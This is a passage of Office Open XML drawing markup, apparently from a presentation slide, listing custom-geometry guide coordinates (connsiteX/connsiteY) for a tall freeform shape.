              <a:gd name="connsiteX83" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
